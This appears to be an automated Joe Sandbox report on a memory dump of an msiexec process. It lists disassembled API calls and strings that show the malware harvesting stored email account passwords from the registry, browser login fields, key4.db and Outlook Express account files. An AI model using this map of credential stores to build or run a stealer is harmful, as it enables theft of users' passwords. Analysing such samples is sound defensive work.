                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                    • API String ID: 2238633743-192783356
                                                                                                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID: (yE$(yE$(yE
                                                                                                    • API String ID: 1865533344-362086290
                                                                                                    • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                    • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                    • memset.MSVCRT ref: 0040E5B8
                                                                                                    • memset.MSVCRT ref: 0040E5CD
                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                    • memset.MSVCRT ref: 0040E6B5
                                                                                                    • memset.MSVCRT ref: 0040E6CC
                                                                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                      • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                    • memset.MSVCRT ref: 0040E736
                                                                                                    • memset.MSVCRT ref: 0040E74F
                                                                                                    • sprintf.MSVCRT ref: 0040E76D
                                                                                                    • sprintf.MSVCRT ref: 0040E788
                                                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                    • memset.MSVCRT ref: 0040E858
                                                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                    • API String ID: 4171719235-3943159138
                                                                                                    • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                    • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                    • GetDC.USER32 ref: 004104E2
                                                                                                    • strlen.MSVCRT ref: 00410522
                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                    • sprintf.MSVCRT ref: 00410640
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                    • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                    • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,68137B60,?,00000000), ref: 00402533
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                    • API String ID: 168965057-606283353
                                                                                                    • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                    • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00402869
                                                                                                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                    • _mbscpy.MSVCRT(?,?,68137B60,?,00000000), ref: 004028A3
                                                                                                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,68137B60,?,00000000), ref: 0040297B
                                                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                    • API String ID: 1497257669-167382505
                                                                                                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2998058495-0
                                                                                                    • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                    • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                    • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                    • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                    • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                    • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                    • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$memcpy
                                                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                    • API String ID: 231171946-2189169393
                                                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                    • API String ID: 633282248-1996832678
                                                                                                    • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                    • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00406782
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
